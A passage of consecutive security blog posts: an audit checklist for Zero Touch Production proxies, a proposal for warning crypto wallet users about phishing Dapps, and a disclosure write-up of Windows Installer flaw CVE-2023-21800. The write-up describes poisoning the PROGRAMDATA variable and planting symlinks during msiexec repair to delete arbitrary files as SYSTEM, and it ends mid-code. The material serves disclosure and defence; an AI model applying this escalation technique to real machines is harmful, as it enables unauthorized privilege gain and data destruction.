At Google, we enforce this behavior by restricting the target system to accept only calls from the proxy through a configuration. This configuration specifies which application-layer remote procedure calls (RPCs) can be executed by which client roles through access control lists (ACLs). After checking the access permissions, the proxy sends the request to be executed via the RPC to the target systems. Typically, each target system has an application-layer program that receives the request and executes it directly on the system. The proxy logs all requests and commands issued by the systems it interacts with.

The safety & security roles of Safe Proxies

There are various outage scenarios prevented by ZTP (e.g., typos, cut/paste errors, wrong terminals, underestimating blast radius of impacted machines, etc.). On paper, it’s a great way to protect production from human errors affecting the availability, but it can also help to prevent some forms of malicious access. A typical scenario involves an SRE that is compromised or malicious and tries to do what an attacker would do with privileges. This could include bringing down or attacking other machines, compromising secrets, or scraping user data programmatically. This is why testing these services will become more and more important as the attackers will find them valuable and target them.

Generic scheme about Safe Proxies

What does ZTP look like today

Many companies nowadays need these secure proxy tools to realize their vision, but they are all trying to reinvent the wheel in one way or another. This is because it’s an immature market and no off-the-shelf solutions exist. During the development, the security team is often included in the steering committee but may lack the domain-specific logic to build similar solutions. Another issue is that since usually the main driver is the DevOps team wanting operational safety, availability and integrity are prioritized at the expense of confidentiality. In reality, the ZTP framework development team should collaborate with SRE and security teams throughout the design and implementation phases, ensuring that security and reliability best practices are woven into the fabric of the framework and not just bolted on at the end.

Last but not least, these solutions are to this day suffering in their adoption rates and are subjected to lax intepretations (to a point where developers are the ones using these systems to access what they’re allowed to touch in production). These services are particularly juicy for both pentesters and attackers. It’s not an understatement to say that every actor compromising a box in a corporate environment should first look at these services to escalate their access.

What to look for when auditing ZTP tools/services

We compiled some of the most common issues we’ve encountered while testing ZTP implementations below:

A. Web Attack Surface

ZTP services often expose a web-based frontend for various purposes such as monitoring, proposing commands or jobs, and checking command output. These frontends are prime targets for classic web security vulnerabilities like Cross-Site Request Forgery (CSRF), Server-Side Request Forgery (SSRF), Insecure Direct Object References (IDORs), XML External Entity (XXE) attacks, and Cross-Origin Resource Sharing (CORS) misconfigurations. If the frontend is also used for command moderation, it presents an even more interesting attack surface.

B. Hooks

Webhooks are widely used in ZTP platforms due to their interaction with team members and on-call engineers. These hooks are crucial for the command approval flow ceremony and for monitoring. Attackers may try to manipulate or suppress any Pagerduty, Slack, or Microsoft Teams bot/hook notifications. Issues to look for include content spoofing, webhook authentication weaknesses, and replay attacks.

C. Safe Centralization

Safety checks in ZTP platforms are usually evaluated centrally. A portion of the solution is often hosted independently for availability, to evaluate the rules set by the SRE team. It’s essential to assess the security of the core service, as exploiting or polluting its visibility can affect the entire infrastructure’s availability (what if the service is down? who can access this service?).

In an hypotetical sample attack scenario, if a rule is set to only allow reboots of a certain percentage of the fleet, can an attacker pollute the fleet status and make the hosts look alive? This can be achieved with ping reply spoofing or via MITM in the case of plain HTTP health endpoints. Under these premises, network communications must be Zero Trust too to defend against this.

D. Insecure Default Templates

The templates for the policy configuration managing the access control for services are usually provided to service owners. These can be a source of errors themselves. Users should be guided to make the right choices by providing templates or automatically generating settings that are secure by default. For a full list of the design strategies presented, see the β€œBuilding Secure and Reliable Systems” bible 3.

E. Logging

Inconsistent or excessive logging retention of command outputs can be hazardous. Attackers might abuse discrepancies in logging retention to access user data or secrets logged in a given command or its results.

F. Rate-limiting

Proper rate-limiting configuration is essential to ensure an attacker cannot change all production β€œat once” by themselves. The rate limiting configuration should be agreed upon with the team responsible for the mediated services.

G. ACL Ownership

Another pitfall is found in what provides the ownership or permission logic for the services. If SREs can edit membership data via the same ZTP service or via other means, an attacker can do the same and bypass the solution entirely.

ZTP

H. Command Safeguards

Strict allowlists of parameters and configurations should be defined for commands or jobs that can be run. Similar to β€œliving off the land binaries” (lolbins), if arguments to these commands are not properly vetted, there’s an increased risk of abuse.

I. Traceability and Scoping

A reason for the pushed command must always be requested by the user (who, when, what, WHY). Ensuring traceability and scoping in the ZTP platform helps maintain a clear understanding of actions taken and their justifications.

J. Scoped Access

The ZTP platform should have rules in place to detect not only if the user is authorized to access user data, but also which kind and at what scale. Lack of fine-grained authorization or scoping rules for querying user data increases the risk of abuse.

K. Different Interfaces, Different Requirements

ZTP platforms usually have two types of proxy interfaces: Remote Procedure Call (RPC) and Command Line Interface (CLI). The RPC proxy is used to run CLI on behalf of the user/service in production in a controlled way. Since the implementation varies between the two interfaces, looking for discrepancies in the access requirements or logic is crucial.

L. Service vs Global rules

The rule evaluation priority (Global over Service-specific) is another area of concern. In general, service rules should not be able to override global rules but only set stricter requirements.

M. Command Parsing

If an allowlist is enforced, inspect how the command is parsed when an allowlist is created (abstract syntax tree (AST), regex, binary match, etc.).

N. Race Conditions

All operations should be queued, and a global queue for the commands should be respected. There should be no chance of race conditions if two concurrent operations are issued.

O. Break-glass

In the ZTP pattern, a break-glass mechanism is always available for emergency response. Auditing this mode is essential. Entering it must be loud, justified, alert security, and be heavily logged. As an additional security measure, the breakglass mechanism for zero trust networking should be available only from specific locations. These locations are the organization’s panic rooms, specific locations with additional physical access controls to offset the increased trust placed in their connectivity.

Conclusions

As more companies develop and adopt Zero Touch Production platforms, it is crucial to understand and test these services for security vulnerabilities. With an increase in vendors and solutions for Zero Touch Production in the coming years, researching and staying informed about these platforms’ security issues is an excellent opportunity for security professionals.

References

  1. MichaΕ‚ CzapiΕ„ski and Rainer Wolafka from Google Switzerland, β€œZero Touch Prod: Towards Safer and More Secure Production Environments”. USENIX (2019). Link / Talk ↩

  2. Ward, Rory, and Betsy Beyer. β€œBeyondcorp: A new approach to enterprise security”, (2014). Link ↩

  3. Adkins, Heather, et al. β€œβ€œBuilding secure and reliable systems: best practices for designing, implementing, and maintaining systems”. O’Reilly Media, (2020). Link ↩

The Case For Improving Crypto Wallet Security

Anatomy Of A Modern Day Crypto Scam

A large number of today’s crypto scams involve some sort of phishing attack, where the user is tricked into visiting a shady/malicious web site and connecting their wallet to it. The main goal is to trick the user into signing a transaction which will ultimately give the attacker control over the user’s tokens.

Usually, it all starts with a tweet or a post on some Telegram group or Slack channel, where a link is sent advertising either a new yield farming protocol boasting large APYs, or a new NFT project which just started minting. In order to interact with the web site, the user would need to connect their wallet and perform some confirmation or authorization steps.

Let’s take a look at the common NFT approve scam. The user is lead to the malicious NFT site, advertising a limited pre-mint of their new NFT collection. The user is then prompted to connect their wallet and sign a transaction, confirming the mint. However, for some reason, the transaction fails. The same happens on the next attempt. With each failed attempt, the user becomes more and more frustrated, believing the issue causes them to miss out on the mint. Their concentration and focus shifts slightly from paying attention to the transactions, to missing out on a great opportunity.

At this point, the phishing is in full swing. A few more failed attempts, and the victim bites.

Wallet Phishing

(Image borrowed from How scammers manipulate Smart Contracts to steal and how to avoid it)

The final transaction, instead of the mint function, calls the setApprovalForAll, which essentially will give the malicious actor control over the user’s tokens. The user by this point is in a state where they blindly confirm transactions, hoping that the minting will not close.

Unfortunately, the last transaction is the one that goes through. Game over for the victim. All the attacker has to do now is act quickly and transfer the tokens away from the user’s wallet before the victim realizes what happened.

These type of attacks are really common today. A user stumbles on a link to a project offering new opportunities for profits, they connect their wallet, and mistakenly hand over their tokens to malicious actors. While a case can be made for user education, responsibility, and researching a project before interacting with it, we believe that software also has a big part to play.

The Case For Improving Crypto Wallet Security

Nobody can deny that the introduction of both blockchain-based technologies and Web3 have had a massive impact on the world. A lot of them have offered the following common set of features:

  • transfer of funds
  • permission-less currency exchange
  • decentralized governance
  • digital collectibles

Regardless of the tech-stack used to build these platforms, it’s ultimately the users who make the platform. This means that users need a way to interact with their platform of choice. Today, the most user-friendly way of interacting with blockchain-based platforms is by using a crypto wallet. In simple terms, a crypto wallet is a piece of software which facilitates signing of blockchain transactions using the user’s private key. There are multiple types of wallets including software, hardware, custodial, and non-custodial. For the purposes of this post, we will focus on software based wallets.

Before continuing, let’s take a short detour to Web2. In that world, we can say that platforms (also called services, portals or servers) are primarily built using TCP/IP based technologies. In order for users to be able to interact with them, they use a user-agent, also known as a web browser. With that said, we can make the following parallel to Web3:

Technology Communication Protocol User-Agent
Web2 HTTP/TLS Web Browser
Web3 Blockchain JSON RPC Crypto Wallet

Web browsers are arguably much, much more complex pieces of software compared to crypto wallets - and with good reason. As the Internet developed, people figured out how to put different media on it and web pages allowed for dynamic and scriptable content. Over time, advancements in HTML and CSS technologies changed what and how content could be shown on a single page. The Internet became a place where people went to socialize, find entertainment, and make purchases. Browsers needed to evolve, to support new technological advancements, which in turn increased complexity. As with all software, complexity is the enemy, and complexity is where bugs and vulnerabilities are born. Browsers needed to implement controls to help mitigate web-based vulnerabilities such as spoofing, XSS, and DNS rebinding while still helping to facilitate secure communication via encrypted TLS connections.

Next, lets see what a typical crypto wallet interaction for a normal user might look like.

The Current State Of Things In The Web3 World

Using a Web3 platform today usually means that a user is interacting with a web application (Dapp), which contains code to interact with the user’s wallet and smart contracts belonging to the platform. The steps in that communication flow generally look like:

1. Open the Dapp

In most cases, the user will navigate their web browser to a URL where the Dapp is hosted (ex. Uniswap). This will load the web page containing the Dapp’s code. Once loaded, the Dapp will try to connect to the user’s wallet.

Dapp and User Wallet

2. Authorizing The Dapp

A few of the protections implemented by crypto wallets include requiring authorization before being able to access the user’s accounts and requests for transactions to be signed. This was not the case before EIP-1102. However, implementing these features helped keep users anonymous, stop Dapp spam, and provide a way for the user to manage trusted and un-trusted Dapp domains.

Authorizing The Dapp 1

If all the previous steps were completed successfully, the user can start using the Dapp.

When the user decides to perform an action (make a transaction, buy an NFT, stake their tokens, etc.), the user’s wallet will display a popup, asking whether the user confirms the action. The transaction parameters are generated by the Dapp and forwarded to the wallet. If confirmed, the transaction will be signed and published to the blockchain, awaiting confirmation.

Authorizing The Dapp 2

Besides the authorization popup when initially connecting to the Dapp, the user is not shown much additional information about the application or the platform. This ultimately burdens the user with verifying the legitimacy and trustworthiness of the Dapp and, unfortunately, this requires some degree of technical knowledge often out-of-reach for the majority of common users. While doing your own research, a common mantra of the Web3 world, is recommended, one misstep can lead to significant loss of funds.

That being said, let’s now take another detour to Web2 world, and see what a similar interaction looks like.

How Does The Web2 World Handle Similar Situations?

Like the previous example, we’ll look at what happens when a user wants to use a Web2 application. Let’s say that the user wants to check their email inbox. They’ll start by navigating their browser to the email domain (ex. Gmail). In the background, the browser performs a TLS handshake, trying to establish a secure connection to Gmail’s servers. This will enable an encrypted channel between the user’s browser and Gmail’s servers, eliminating the possibility of any eavesdropping. If the handshake is successful, an encrypted connection is established and communicated to the user through the browser’s UI.

Browser Lock

The secure connection is based on certificates issued for the domain the user is trying to access. A certificate contains a public key used to establish the encrypted connection. Additionally, certificates must be signed by a trusted third-party called a Certificate Authority (CA), giving the issued certificate legitimacy and guaranteeing that it belongs to the domain being accessed.

But, what happens if that is not the case? What happens when the certificate is for some reason rejected by the browser? Well, in that case a massive red warning is shown, explaining what happened to the user.

Browser Certificate Error

Such warnings will be shown when a secure connection could not be established, the certificate of the host is not trusted or if the certificate is expired. The browser also tries to show, in a human-readable manner, as much useful information about the error as possible. At this point, it’s the choice of the user whether they trust the site and want to continue interacting with it. The task of the browser is to inform the user of potential issues.

What Can Be Done?

Crypto wallets should show the user as much information about the action being performed as possible. The user should see information about the domain/Dapp they are interacting with. Details about the actual transaction’s content, such as what function is being invoked and its parameters should be displayed in a user-readable fashion.

Comparing both previous examples, we can notice a lack of verification and information being displayed in crypto wallets today. This, then poses the question: what can be done? There exist a number of publicly available indicators for the health and legitimacy of a project. We believe communicating these to the user may be a good step forward in addressing this issue. Let’s go quickly go through them.

Proof Of Smart Contract Ownership

It is important to prove that a domain has ownership over the smart contracts with which it interacts. Currently, this mechanism doesn’t seem to exist. However, we think we have a good solution. Similarly to how Apple performs merchant domain verification, a simple JSON file or dapp_file can be used to verify ownership. The file can be stored on the root of the Dapp’s domain, on the path .well-known/dapp_file. The JSON file can contain the following information:

  • address of the smart contract the Dapp is interacting with
  • timestamp showing when the file was generated
  • signature of the content, verifying the validity of the file

At this point, a reader might say: β€œHow does this show ownership of the contract?”. The key to that is the signature. Namely, the signature is generated by using the private key of the account which deployed the contract. The transparency of the blockchain can be used to get the deployer address, which can then be used to verify the signature (similarly to how Ethereum smart contracts verify signatures on-chain).

This mechanism enables creating an explicit association between a smart contract and the Dapp. The association can later be used to perform additional verification.

Domain Registration Records

When a new domain is purchased or registered, a public record is created in a public registrar, indicating the domain is owned by someone and is no longer available for purchase. The domain name is used by the Domain Name Service, or DNS, which translates it (ex www.doyensec.com) to a machine-friendly IP address (ex. 34.210.62.107).

The creation date of a DNS record shows when the Dapp’s domain was initially purchased. So, if a user is trying to interact with an already long established project and runs into a domain which claims to be that project with a recently created domain registration record, it may be a signal of possible fraudulent activities.

TLS Certificates

Creation and expiration dates of TLS certificates can be viewed in a similar fashion as DNS records. However, due to the short duration of certificates issued by services such as Let’s Encrypt, there is a strong chance that visitors of the Dapp will be shown a relatively new certificate.

TLS certificates, however, can be viewed as a way of verifying a correct web site setup where the owner took additional steps to allow secure communication between the user and their application.

Smart Contract Source Code Verification Status

Published and verified source code allows for audits of the smart contract’s functionality and can allow quick identification of malicious activity.

Smart Contract Deployment Date

The smart contract’s deployment date can provide additional information about the project. For example, if attackers set up a fake Uniswap web site, the likelihood of the malicious smart contract being recently deployed is high. If interacting with an already established, legitimate project, such a discrepancy should alarm the user of potential malicious activity.

Smart Contract Interactions

Trustworthiness of a project can be seen as a function of the number of interactions with that project’s smart contracts. A healthy project, with a large user base will likely have a large number of unique interactions with the project’s contracts. A small number of interactions, unique or not, suggest the opposite. While typical of a new project, it can also be an indicator of smart contracts set up to impersonate a legitimate project. Such smart contracts will not have the large user base of the original project, and thus the number of interactions with the project will be low.

Overall, a large number of unique interactions over a long period of time with a smart contract may be a powerful indicator of a project’s health and the health of its ecosystem.

Our Suggestion

While there are authorization steps implemented when a wallet is connecting to an unknown domain, we think there is space for improvement. The connection and transaction signing process can be further updated to show user-readable information about the domain/Dapp being accessed.

As a proof-of-concept, we implemented a simple web service https://github.com/doyensec/wallet-info. The service utilizes public information, such as domain registration records, TLS certificate information and data available via Etherscan’s API. The data is retrieved, validated, parsed and returned to the caller.

The service provides access to the following endpoints:

  • /host?url=<url>
  • /contract?address=<address>

The data these endpoints return can be integrated in crypto wallets at two points in the user’s interaction.

Initial Dapp Access

The /host endpoint can be used when the user is initially connecting to a Dapp. The Dapp’s URL should be passed as a parameter to the endpoint. The service will use the supplied URL to gather information about the web site and its configuration. Additionally, the service will check for the presence of the dapp_file on the site’s root and verify its signature. Once processing is finished, the service will respond with:

{
  
  "name": "Example Dapp",
  "timestamp": "2000-01-01T00:00:00Z",
  "domain": "app.example.com",
  "tls": true,
  "tls_issued_on": "2022-01-01T00:00:00Z",
  "tls_expires_on": "2022-01-01TT00:00:00Z",
  "dns_record_created": "2012-01-01T00:00:00Z",
  "dns_record_updated": "2022-08-14T00:01:31Z",
  "dns_record_expires": "2023-08-13T00:00:00Z",
  "dapp_file": true,
  "valid_signature": true
}

This information can be shown to the user in a dialog UI element, such as:

Wallet Dialog Safe

As a concrete example, lets take a look at this fake Uniswap site was active during the writing of this post. If a user tried to connect their wallet to the Dapp running on the site, the following information would be returned to the user:

{
  
  "name": null,
  "timestamp": null,
  "domain": "apply-uniswap.com",
  "tls": true,
  "tls_issued_on": "2023-02-06T22:37:19Z",
  "tls_expires_on": "2023-05-07T22:37:18Z",
  "dns_record_created": "2023-02-06T23:31:09Z",
  "dns_record_updated": "2023-02-06T23:31:10Z",
  "dns_record_expires": "2024-02-06T23:31:09Z",
  "dapp_file": false,
  "valid_signature": false
}

The missing information from the response reflect that the dapp_file was not found on this domain. This information will then be reflected on the UI, informing the user of potential issues with the Dapp:

Wallet Dialog Domain Unsafe

At this point, the users can review the information and decide whether they feel comfortable giving the Dapp access to their wallet. Once the Dapp is authorized, this information doesn’t need to be shown anymore. Though, it would be beneficial to occasionally re-display this information, so that any changes in the Dapp or its domain will be communicated to the user.

Making A Transaction

Transactions can be split in two groups: transactions that transfer native tokens and transactions which are smart contract function calls. Based on the type of transaction being performed, the /contract endpoint can be used to retrieve information about the recipient of the transferred assets.

For our case, the smart contract function calls are the more interesting group of transactions. The wallet can retrieve information about both the smart contract on which the function will be called as well as the function parameter representing the recipient. For example the spender parameter in the approve(address spender, uint256 amount) function call. This information can be retrieved on a case-by-case basis, depending on the function call being performed.

Signatures of widely used functions are available and can be implemented in the wallet as a type of an allow or safe list. If a signature is unknown, the user should be informed about it.

Verifying the recipient gives users confidence they are transferring tokens, or allowing access to their tokens for known, legitimate addresses.

An example response for a given address will look something like:

{
  "is_contract": true,
  "contract_address": "0xF4134146AF2d511Dd5EA8cDB1C4AC88C57D60404",
  "contract_deployer": "0x002362c343061fef2b99d1a8f7c6aeafe54061af",
  "contract_deployed_on": "2023-01-01T00:00:00Z",
  "contract_tx_count": 10,
  "contract_unique_tx": 5,
  "valid_signature": true,
  "verified_source": false
}

In the background, the web service will gather information about the type of address (EOA or smart contract), code verification status, address interaction information etc. All of that should be shown to the user as part of the transaction confirmation step.

Wallet Dialog  Unsafe

Links to the smart contract and any additional information can be provided here, helping users perform additional verification if they so wish.

In the case of native token transfers, the majority of verification consists of typing in the valid to address. This is not a task that is well suited for automatic verification. For this use case, wallets provide an β€œaddress book” like functionality, which should be utilized to minimize any user errors when initializing a transaction.

Conclusion

The point of this post is to highlight the shortcomings of today’s crypto wallet implementations, to present ideas, and make suggestions for how they can be improved. This field is actively being worked on. Recently, MetaMask updated their confirmation UI to display additional information, informing users of potential setApprovalForAll scams. This is a step in the right direction, but there is still a long way to go. Features like these can be built upon and augmented, to a point where users can make transactions and know, to a high level of certainty, that they are not making a mistake or being scammed.

There are also third-party groups like WalletGuard and ZenGo who have implemented similar verifications described in this post. These features should be a standard and required for every crypto wallet, and not just an additional piece of software that needs to be installed.

Like the user-agent of Web2, the web browser, user-agents of Web3 should do as much as possible to inform and protect their users.

Our implementation of the wallet-info web service is just an example of how public information can be pooled together. That information, combined with a good UI/UX design, will greatly improve the security of crypto wallets and, in turn, the security of the entire Web3 ecosystem.

Does Dapp verification completely solve the phishing/scam problem? Unfortunately, the answer is no. The proposed changes can help users in distinguishing between legitimate projects and potential scams, and guide them to make the right decision. Dedicated attackers, given enough time and funds, will always be able to produce a smart contract, Dapp or web site, which will look harmless using the indicators described above. This is true for both the Web2 and Web3 world.

Ultimately, it is up to the user to decide if the they feel comfortable giving their login credentials to a web site, or access to their crypto wallet to a Dapp. All software can do is point them in the right direction.

Windows Installer EOP (CVE-2023-21800)

TL;DR: This blog post describes the details and methodology of our research targeting the Windows Installer (MSI) installation technology. If you’re only interested in the vulnerability itself, then jump right there

Introduction

Recently, I decided to research a single common aspect of many popular Windows applications - their MSI installer packages.

Not every application is distributed this way. Some applications implement custom bootstrapping mechanisms, some are just meant to be dropped on the disk. However, in a typical enterprise environment, some form of control over the installed packages is often desired. Using the MSI packages simplifies the installation process for any number of systems and also provides additional benefits such as automatic repair, easy patching, and compatibility with GPO. A good example is Google Chrome, which is typically distributed as a standalone executable, but an enterprise package is offered on a dedicated domain.

Another interesting aspect of enterprise environments is a need for strict control over employee accounts. In particular, in a well-secured Windows environment, the rule of least privileges ensures no administrative rights are given unless there’s a really good reason. This is bad news for malware or malicious attackers who would benefit from having additional privileges at hand.

During my research, I wanted to take a look at the security of popular MSI packages and understand whether they could be used by an attacker for any malicious purposes and, in particular, to elevate local privileges.

Typical installation

It’s very common for the MSI package to require administrative rights. As a result, running a malicious installer is a straightforward game-over. I wanted to look at legitimate, properly signed MSI packages. Asking someone to type an admin password, then somehow opening elevated cmd is also an option that I chose not to address in this blog post.

Let’s quickly look at how the installer files are generated. Turns out, there are several options to generate an MSI package. Some of the most popular ones are WiX Toolset, InstallShield, and Advanced Installer. The first one is free and open-source, but requires you to write dedicated XML files. The other two offer various sets of features, rich GUI interfaces, and customer support, but require an additional license. One could look for generic vulnerabilities in those products, however, it’s really hard to address all possible variations of offered features. On the other hand, it’s exactly where the actual bugs in the installation process might be introduced.

During the installation process, new files will be created. Some existing files might also be renamed or deleted. The access rights to various securable objects may be changed. The interesting question is what would happen if unexpected access rights are present. Would the installer fail or would it attempt to edit the permission lists? Most installers will also modify Windows registry keys, drop some shortcuts here and there, and finally log certain actions in the event log, database, or plain files.

The list of actions isn’t really sealed. The MSI packages may implement the so-called custom actions which are implemented in a dedicated DLL. If this is the case, it’s very reasonable to look for interesting bugs over there.

Once we have an installer package ready and installed, we can often observe a new copy being cached in the C:\Windows\Installers directory. This is a hidden system directory where unprivileged users cannot write. The copies of the MSI packages are renamed to random names matching the following regular expression: ^[0-9a-z]{7}\.msi$. The name will be unique for every machine and even every new installation. To identify a specific package, we can look at file properties (but it’s up to the MSI creator to decide which properties are configured), search the Windows registry, or ask the WMI:

$ Get-WmiObject -class Win32_Product | ? { $_.Name -like "*Chrome*" } | select IdentifyingNumber,Name

IdentifyingNumber                      Name
-----------------                      ----
{B460110D-ACBF-34F1-883C-CC985072AF9E} Google Chrome

Referring to the package via its GUID is our safest bet. However, different versions of the same product may still have different identifiers.

Assuming we’re using an unprivileged user account, is there anything interesting we can do with that knowledge?

Repair process

The builtin Windows tool, called msiexec.exe, is located in the System32 and SysWOW64 directories. It is used to manage the MSI packages. The tool is a core component of Windows with a long history of vulnerabilities. As a side note, I also happen to have found one such issue in the past (CVE-2021-26415). The documented list of its options can be found on the MSDN page although some additional undocumented switches are also implemented.

The flags worth highlighting are:

  • /l*vx to log any additional details and search for interesting events
  • /qn to hide any UI interactions. This is extremely useful when attempting to develop an automated exploit. On the other hand, potential errors will result in new message boxes. Until the message is accepted, the process does not continue and can be frozen in an unexpected state. We might be able to modify some existing files before the original access rights are reintroduced.

The repair options section lists flags we could use to trigger the repair actions. These actions would ensure the bad files are removed, and good files are reinstalled instead. The definition of bad is something we control, i.e., we can force the reinstallation of all files, all registry entries, or, say, only those with an invalid checksum.

Parameter Description
/fp Repairs the package if a file is missing.
/fo Repairs the package if a file is missing, or if an older version is installed.
/fe Repairs the package if file is missing, or if an equal or older version is installed.
/fd Repairs the package if file is missing, or if a different version is installed.
/fc Repairs the package if file is missing, or if checksum does not match the calculated value.
/fa Forces all files to be reinstalled.
/fu Repairs all the required user-specific registry entries.
/fm Repairs all the required computer-specific registry entries.
/fs Repairs all existing shortcuts.
/fv Runs from source and re-caches the local package.

Most of the msiexec actions will require elevation. We cannot install or uninstall arbitrary packages (unless of course the system is badly misconfigured). However, the repair option might be an interesting exception! It might be, because not every package will work like this, but it’s not hard to find one that will. For these, the msiexec will auto-elevate to perform necessary actions as a SYSTEM user. Interestingly enough, some actions will be still performed using our unprivileged account making the case even more noteworthy.

The impersonation of our account will happen for various security reasons. Only some actions can be impersonated, though. If you’re seeing a file renamed by the SYSTEM user, it’s always going to be a fully privileged action. On the other hand, when analyzing who exactly writes to a given file, we need to look at how the file handle was opened in the first place.

We can use tools such as Process Monitor to observe all these events. To filter out the noise, I would recommend using the settings shown below. It’s possible to miss something interesting, e.g., a child processes’ actions, but it’s unrealistic to dig into every single event at once. Also, I’m intentionally disabling registry activity tracking, but occasionally it’s worth reenabling this to see if certain actions aren’t controlled by editable registry keys.

Procmon filter settings

Another trick I’d recommend is to highlight the distinction between impersonated and non-impersonated operations. I prefer to highlight anything that isn’t explicitly impersonated, but you may prefer to reverse the logic.

Procmon highlighting settings

Then, to start analyzing the events of the aforementioned Google Chrome installer, one could run the following command:

msiexec.exe /fa '{B460110D-ACBF-34F1-883C-CC985072AF9E}'

The stream of events should be captured by ProcMon but to look for issues, we need to understand what can be considered an issue. In short, any action on a securable object that we can somehow modify is interesting. SYSTEM writes a file we control? That’s our target.

Typically, we cannot directly control the affected path. However, we can replace the original file with a symlink. Regular symlinks are likely not available for unprivileged users, but we may use some tricks and tools to reinvent the functionality on Windows.

Windows EoP primitives

Although we’re not trying to pop a shell out of every located vulnerability, it’s interesting to educate the readers on what would be possible given some of the Elevation of Privilege primitives.

With an arbitrary file creation vulnerability we could attack the system by creating a DLL that one of the system processes would load. It’s slightly harder, but not impossible, to locate a Windows process that loads our planted DLL without rebooting the entire system.

Having an arbitrary file creation vulnerability but with no control over the content, our chances to pop a shell are drastically reduced. We can still make Windows inoperable, though.

With an arbitrary file delete vulnerability we can at least break the operating system. Often though, we can also turn this into an arbitrary folder delete and use the sophisticated method discovered by Abdelhamid Naceri to actually pop a shell.

The list of possible primitives is long and fascinating. A single EoP primitive should be treated as a serious security issue, nevertheless.

One vulnerability to rule them all (CVE-2023-21800)

I’ve observed the same interesting behavior in numerous tested MSI packages. The packages were created by different MSI creators using different types of resources and basically had nothing in common. Yet, they were all following the same pattern. Namely, the environment variables set by the unprivileged user were also used in the context of the SYSTEM user invoked by the repair operation.

Although I initially thought that the applications were incorrectly trusting some environment variables, it turned out that the Windows Installer’s rollback mechanism was responsible for the insecure actions.

7-zip

7-Zip provides dedicated Windows Installers which are published on the project page. The following file was tested:

Filename Version
7z2201-x64.msi 22.01

To better understand the problem, we can study the source code of the application. The installer, defined in the DOC/7zip.wxs file, refers to the ProgramMenuFolder identifier.

     <Directory Id="ProgramMenuFolder" Name="PMenu" LongName="Programs">
        <Directory Id="PMenu" Name="7zip" LongName="7-Zip" />
      </Directory>
      ...
     <Component Id="Help" Guid="$(var.CompHelp)">
        <File Id="_7zip.chm" Name="7-zip.chm" DiskId="1" >
            <Shortcut Id="startmenuHelpShortcut" Directory="PMenu" Name="7zipHelp" LongName="7-Zip Help" />
        </File>
     </Component>

The ProgramMenuFolder is later used to store some components, such as a shortcut to the 7-zip.chm file.

As stated on the MSDN page:

The installer sets theΒ ProgramMenuFolderΒ property to the full path of the Program Menu folder for the current user. If an β€œAll Users” profile exists and theΒ ALLUSERSΒ property is set, then this property is set to the folder in the β€œAll Users” profile.

In other words, the property will either point to the directory controlled by the current user (in %APPDATA% as in the previous example), or to the directory associated with the β€œAll Users” profile.

While the first configuration does not require additional explanation, the second configuration is tricky. The C:\ProgramData\Microsoft\Windows\Start Menu\Programs path is typically used while C:\ProgramData is writable even by unprivileged users. The C:\ProgramData\Microsoft path is properly locked down. This leaves us with a secure default.

However, the user invoking the repair process may intentionally modify (i.e., poison) the PROGRAMDATA environment variable and thus redirect the β€œAll Users” profile to the arbitrary location which is writable by the user. The setx command can be used for that. It modifies variables associated with the current user but it’s important to emphasize that only the future sessions are affected. A completely new cmd.exe instance should be started to inherit the new settings.

Instead of placing legitimate files, a symlink to an arbitrary file can be placed in the %PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\7-zip\ directory as one of the expected files. As a result, the repair operation will:

  • Remove the arbitrary file (using the SYSTEM privileges)
  • Attempt to restore the original file (using an unprivileged user account)

The second action will fail, resulting in an Arbitrary File Delete primitive. This can be observed on the following capture, assuming we’re targeting the previously created C:\Windows\System32\__doyensec.txt file. We intentionally created a symlink to the targeted file under the C:\FakeProgramData\Microsoft\Windows\Start Menu\Programs\7-zip\7-Zip Help.lnk path.

The operation result in REPARSE

Firstly, we can see the actions resulting in the REPARSE status. The file is briefly processed (or rather its attributes are), and the SetRenameInformationFile is called on it. The rename part is slightly misleading. What is actually happening is that file is moved to a different location. This is how the Windows installer creates rollback instructions in case something goes wrong. As stated before, the SetRenameInformationFile doesn’t work on the file handle level and cannot be impersonated. This action runs with the full SYSTEM privileges.

Later on, we can spot attempts to restore the original file, but using an impersonated token. These actions result in ACCESS DENIED errors, therefore the targeted file remains deleted.

The operation result in REPARSE

The same sequence was observed in numerous other installers. For instance, I worked with PuTTY’s maintainer on a possible workaround which was introduced in the 0.78 version. In that version, the elevated repair is allowed only if administrator credentials are provided. However, this isn’t functionally equal and has introduced some other issues. The 0.79 release should restore the old WiX configuration.

Redirection Guard

The issue was reported directly to Microsoft with all the above information and a dedicated exploit. Microsoft assigned CVE-2023-21800 identifier to it.

It was reproducible on the latest versions of Windows 10 and Windows 11. However, it was not bounty-eligible as the attack was already mitigated on the Windows 11 Developer Preview. The same mitigation has been enabled with the 2022-02-14 update.

In October 2022 Microsoft shipped a new feature called Redirection Guard on Windows 10 and Windows 11. The update introduced a new type of mitigation called ProcessRedirectionTrustPolicy and the corresponding PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY structure. If the mitigation is enabled for a given process, all processed junctions are additionally verified. The verification first checks if the filesystem junction was created by non-admin users and, if so, if the policy prevents following them. If the operation is prevented, the error 0xC00004BC is returned. The junctions created by admin users are explicitly allowed as having a higher trust-level label.

In the initial round, Redirection Guard was enabled for the print service. The 2022-02-14 update enabled the same mitigation on the msiexec process.

This can be observed in the following ProcMon capture:

The 0xC00004BC error returned by the new mitigation

The msiexec is one of a few applications that have this mitigation enforced by default. To check for yourself, use the following not-so-great code:

#include <windows.h>
#include <TlHelp32.h>
#include <cstdio>
#include <string>
#include <vector>
#include <memory>

using AutoHandle = std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)>;
using Proc = std::pair<std::wstring, AutoHandle>;

std::vector<Proc> getRunningProcesses() {
    std::vector<Proc> processes;

    std::unique_ptr<std::remove_pointer_t<HANDLE>, decltype(&CloseHandle)> snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    Process32First(snapshot.get(), &pe32);

    do {
        auto h = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
        if (h) {
            processes.emplace_back(std::wstring(pe32.szExeFile), AutoHandle(h, &CloseHandle));
        }
    } while (Process32Next(snapshot.get(), &pe32));

    return processes;
}

int main() {
    auto runningProcesses = getRunningProcesses();

    PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY policy;

    for (auto& process : runningProcesses) {
        auto result = GetProcessMitigationPolicy(process.second.get(), ProcessRedirectionTrustPolicy, &policy, sizeof(policy));

